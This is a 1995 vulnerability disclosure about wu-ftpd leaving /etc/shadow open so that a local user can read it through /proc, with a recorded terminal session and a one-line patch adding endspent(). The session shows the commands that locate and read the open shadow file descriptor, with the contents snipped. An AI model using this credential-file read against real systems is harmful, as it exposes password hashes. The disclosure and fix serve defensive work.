This affects wu-ftpd and possibly any other programs with incorrectly hacked in shadow support. Non-shadow versions found in most Linux distributions are not affected - or are all affected and you can't fix it because /etc/passwd is world-readable, depending on how you look at it... This is related to the /proc security problem discussed recently - normal users can read /etc/shadow because this file is not closed and /proc gives access to all open files. Below is how to check if you are vulnerable: Script started on Fri Jun 9 15:09:49 1995 marekm@i17linuxa:~$ ftp -n localhost Connected to localhost. 220 i17linuxa FTP server (Version wu-2.4(2) Thu Jun 1 20:05:10 MET DST 1995) ready. Remote system type is UNIX. Using binary mode to transfer files. ftp> user marekm 331 Password required for marekm. Password: 230 User marekm logged in. ftp> ^Z [1]+ Stopped ftp -n localhost marekm@i17linuxa:~$ ps uwx USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND marekm 15510 0.0 5.4 384 384 pp6 S 14:32 0:01 -bash marekm 15808 0.2 2.2 29 156 pp6 S 15:09 0:00 script marekm 15809 0.1 2.3 29 168 pp6 S 15:09 0:00 script marekm 15810 1.3 6.7 377 472 pp4 S 15:09 0:00 bash -i marekm 15811 0.7 3.9 113 276 pp4 T 15:09 0:00 ftp -n localhost marekm 15812 2.0 7.1 157 500 con S 15:09 0:00 -localhost: marekm: IDLE marekm 15816 0.0 3.1 64 224 pp4 R 15:10 0:00 ps uwx marekm@i17linuxa:~$ ls -al /proc/15812/fd total 0 dr-x------ 2 marekm users 0 Jun 9 15:10 . dr-xr-xr-x 4 marekm users 0 Jun 9 15:10 .. lrwx------ 1 marekm users 64 Jun 9 15:10 0 -> [0000]:0 lrwx------ 1 marekm users 64 Jun 9 15:10 1 -> [0000]:0 l-wx------ 1 marekm users 64 Jun 9 15:10 10 -> [0301]:4623 l-wx------ 1 marekm users 64 Jun 9 15:10 11 -> [0301]:4624 l-wx------ 1 marekm users 64 Jun 9 15:10 2 -> [0301]:10404 lrwx------ 1 marekm users 64 Jun 9 15:10 3 -> [0000]:0 lrwx------ 1 marekm users 64 Jun 9 15:10 4 -> [0000]:0 lr-x------ 1 marekm users 64 Jun 9 15:10 5 -> [0301]:38392 lr-x------ 1 marekm users 64 Jun 9 15:10 6 -> [0301]:8567 lrwx------ 1 marekm users 64 Jun 9 15:10 7 -> [0301]:34549 lr-x------ 1 marekm users 64 Jun 9 15:10 8 -> [0301]:8569 lr-x------ 1 marekm users 64 Jun 9 15:10 9 -> [0301]:32007 marekm@i17linuxa:~$ ls -i /etc/shadow 32007 /etc/shadow marekm@i17linuxa:~$ cat /proc/15812/fd/9 [ snip - I don't want everyone to see my /etc/shadow :-) ] marekm@i17linuxa:~$ fg ftp -n localhost 221 Goodbye. marekm@i17linuxa:~$ exit Script done on Fri Jun 9 15:11:26 1995 OK, now for the fix: --- ftpd.c.orig Thu Jun 1 19:27:42 1995 +++ ftpd.c Fri Jun 9 14:50:46 1995 @@ -996,6 +996,7 @@ struct spwd *spw = getspnam( pw->pw_name ); if( !spw ) { pw->pw_passwd = ""; } else { pw->pw_passwd = spw->sp_pwdp; } + endspent(); } #endif Now /etc/shadow is correctly closed as soon as possible. The right fix is IMHO to do some more checks in the kernel to remove /proc holes, but I am not in a position to do it correctly... Linus, 1.2.10? :-) Regards, Marek Michalkiewicz